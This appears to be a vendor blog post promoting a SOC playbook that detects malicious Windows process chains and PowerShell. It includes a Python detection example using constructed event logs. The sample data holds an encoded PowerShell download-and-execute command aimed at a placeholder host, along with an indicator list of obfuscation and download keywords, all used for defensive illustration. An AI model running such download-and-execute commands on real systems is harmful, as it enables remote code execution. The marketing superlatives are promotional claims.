When attackers breach a network, they don’t just grab the first data they find and shut down their attack, content with having broken through defenses and made an illicit gain. Instead, they get busy, even if they pause now and then to avoid detection. They usually move “laterally,” exploring the network to discover what systems and services you have in place, and search for more vulnerabilities and assets to steal or compromise.

As part of this lateral movement, they run processes on Windows endpoints. Many of these processes use PowerShell, the Windows command-line shell and scripting language designed to automate routine tasks for administrators. Since Microsoft released PowerShell 6.0 as an open source project in 2016, malicious use of PowerShell has skyrocketed. PowerShell malware grew 432 percent between 2016 and 2017, according to McAfee Labs. Today, if a network is under attack, PowerShell activity may be a primary line of attack.

Fortunately, organizations have a line of defense, even if at first it seems precariously narrow. When attackers use PowerShell or other Windows processes, the processes they create are recorded in Windows process creation logs. In a typical enterprise, millions of these log entries are generated and collected daily, and that sheer volume makes it difficult to identify the entries tied to suspicious or outright malicious events.

Windows processes therefore present another critical challenge for security analysts and Security Operations Centers (SOCs). Attackers are on the move, creating or deleting files, changing file permissions, downloading malware, creating accounts and performing other nefarious activities. These activities are being logged. But combing through these enormous log files for indications of attacks is time-consuming, and time is something SOC teams never have enough of.

Fortunately, security automation leveraging machine learning can help.

Introducing the LogicHub Windows Process Creation Events Playbook

LogicHub has refined and automated hundreds of threat hunting detection patterns and techniques and mapped them to the MITRE ATT&CK framework, a public knowledge base of adversary tactics and techniques that MITRE has compiled based on real-world observations. Using MITRE’s detailed descriptions of recent attacks using Windows processes and PowerShell malware, LogicHub has created an executable playbook for detecting and stopping security attacks. The playbook runs on the LogicHub SOAR+ platform, the only security automation platform that surpasses traditional Security Orchestration and Automated Response (SOAR) capabilities by automating threat hunting, alert triage, and incident response.

Major capabilities in this pre-built playbook include:

  • Process Chain Monitoring
    The playbook tracks process execution logs to reconstruct “process chains,” the sequence of parent and child process executions, then uses a machine learning algorithm to compare each chain against known good and known bad behavior (including “Living Off the Land Binaries,” aka “LOLBins”: built-in Windows commands that attackers and malicious code often repurpose) to predict whether a particular chain is likely to be malicious.
  • Automated PowerShell Command Triage
    De-obfuscates and analyzes PowerShell commands, factoring in hundreds of patterns and a machine learning classifier trained on your organization’s data.
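To make the two capabilities above concrete, here is an added example in Python that is not LogicHub code and does not use the LogicHub platform or its trained classifier. It reconstructs process chains from constructed Windows Security event 4688 records (a simplified key="value" rendering of the real event's NewProcessId, CreatorProcessId, NewProcessName and CommandLine fields), flags LOLBins and Office-spawned shells, decodes PowerShell -EncodedCommand arguments (base64 of UTF-16LE text) before pattern matching, and assigns a simple heuristic score in place of the machine learning model. The sample records, the LOLBin subset and the indicator substrings are illustrative assumptions, not the playbook's detection content.

```python
"""Toy process-chain monitoring and PowerShell triage over constructed 4688-style records."""
import base64
import re

# Built-in Windows binaries that attackers frequently repurpose ("LOLBins").
# Illustrative subset chosen for this example, not an exhaustive list.
LOLBINS = {"certutil.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
           "wscript.exe", "cscript.exe", "bitsadmin.exe", "msiexec.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Substrings in a (decoded) PowerShell command line that raise the score (assumed list).
PS_INDICATORS = ["downloadstring", "invoke-expression", "iex ", "frombase64string",
                 "-nop", "-w hidden", "bypass"]
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def parse_event(line):
    """Parse one constructed key="value" record carrying the 4688 fields we need."""
    f = dict(re.findall(r'(\w+)="([^"]*)"', line))
    return {
        "pid": int(f["NewProcessId"], 16),       # 4688 logs process IDs as hex strings
        "ppid": int(f["CreatorProcessId"], 16),
        "image": f["NewProcessName"].rsplit("\\", 1)[-1].lower(),
        "cmd": f["CommandLine"],
    }


def index_events(lines):
    """Map NewProcessId -> parsed event so chains can be walked by parent ID."""
    return {e["pid"]: e for e in (parse_event(l) for l in lines)}


def decode_encoded_command(cmd):
    """Return the plaintext of a -EncodedCommand argument, or None if there is none."""
    m = ENC_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed blob: treat as not decodable rather than crash triage


def build_chain(events_by_pid, pid):
    """Follow CreatorProcessId links and return the ancestry root -> leaf as image names."""
    chain, seen = [], set()
    while pid in events_by_pid and pid not in seen:
        seen.add(pid)  # PID reuse could otherwise create a cycle
        ev = events_by_pid[pid]
        chain.append(ev["image"])
        pid = ev["ppid"]
    return list(reversed(chain))


def score_event(events_by_pid, pid):
    """Heuristic stand-in for a trained classifier: returns (score, reasons)."""
    ev = events_by_pid[pid]
    chain = build_chain(events_by_pid, pid)
    score, reasons = 0, []
    parent = chain[-2] if len(chain) > 1 else None
    if parent in OFFICE_APPS and ev["image"] in SHELLS | LOLBINS:
        score += 5
        reasons.append(f"{parent} directly spawned {ev['image']}")
    elif any(a in OFFICE_APPS for a in chain[:-1]):
        score += 3
        reasons.append("Office application in process ancestry")
    if ev["image"] in LOLBINS:
        score += 2
        reasons.append(f"LOLBin {ev['image']}")
    # De-obfuscate first, then match patterns on the visible plus decoded text.
    text = ENC_RE.sub("", ev["cmd"])
    decoded = decode_encoded_command(ev["cmd"])
    if decoded is not None:
        score += 3
        reasons.append("encoded PowerShell command")
        text += " " + decoded
    hits = [k for k in PS_INDICATORS if k in text.lower()]
    if hits:
        score += 2 * len(hits)
        reasons.append("indicators: " + ", ".join(hits))
    return score, reasons


def triage(lines, threshold=5):
    """Score every event and return those at or above the threshold, highest first."""
    evs = index_events(lines)
    out = []
    for pid, ev in evs.items():
        score, reasons = score_event(evs, pid)
        if score >= threshold:
            out.append({"pid": pid, "image": ev["image"], "score": score,
                        "chain": " > ".join(build_chain(evs, pid)), "reasons": reasons})
    return sorted(out, key=lambda r: r["score"], reverse=True)


# Constructed sample records (not real logs). The encoded blob is built here from a
# constructed plaintext so the example stays self-contained.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"
    .encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    'EventID="4688" NewProcessId="0x400" CreatorProcessId="0x100" NewProcessName="C:\\Windows\\explorer.exe" CommandLine="explorer.exe"',
    'EventID="4688" NewProcessId="0x500" CreatorProcessId="0x400" NewProcessName="C:\\Program Files\\Microsoft Office\\WINWORD.EXE" CommandLine="WINWORD.EXE /n C:\\Users\\alice\\invoice.docm"',
    f'EventID="4688" NewProcessId="0x600" CreatorProcessId="0x500" NewProcessName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" CommandLine="powershell.exe -nop -w hidden -enc {ENCODED}"',
    'EventID="4688" NewProcessId="0x700" CreatorProcessId="0x600" NewProcessName="C:\\Windows\\System32\\certutil.exe" CommandLine="certutil.exe -decode C:\\Users\\Public\\in.txt C:\\Users\\Public\\out.dat"',
    'EventID="4688" NewProcessId="0x800" CreatorProcessId="0x400" NewProcessName="C:\\Windows\\System32\\cmd.exe" CommandLine="cmd.exe"',
    'EventID="4688" NewProcessId="0x900" CreatorProcessId="0x800" NewProcessName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" CommandLine="powershell.exe Get-Service -Name Spooler"',
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"[{hit['score']:>2}] {hit['chain']}  <- {'; '.join(hit['reasons'])}")
```

Run as a script, the benign administrator session (explorer > cmd > powershell running Get-Service) scores zero and is never shown, while the Word-spawned encoded PowerShell and its certutil child surface with the chain and the reasons that produced the score, which is the kind of explanation an analyst needs to validate a verdict. A production version would replace the fixed weights with a model trained on the organization's own baseline and read events from the SIEM rather than an inline list.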

The LogicHub Windows Process Creation Events playbook identifies suspicious and malicious events with the accuracy of an experienced threat hunting team, but with the speed and convenience of AI-powered automated analysis. The playbook shortcuts the need for months of detection content development and tuning by automatically sorting through the noise of benign events to pick out the clear signals of incipient or active attacks. SOCs can have the playbook up and running after just a few hours, immediately improving their ability to detect threats and defend against attacks.

The Windows Process Creation Events Playbook is just one of many playbooks available on the LogicHub Security Automation platform. LogicHub customers can also build custom playbooks to meet their own security requirements.

The LogicHub platform is the only security automation platform that delivers autonomous detection and response for security analysts. By applying machine learning and analytics on vast sets of event data, LogicHub automates security analyst workflows and decisions, helping teams save time, find critical threats, and eliminate false positives. LogicHub also provides a full explanation of the scoring logic to help security analysts review and validate results.

To learn more about the LogicHub Windows Process Creation Events Playbook, read our use case or contact a LogicHub sales representative.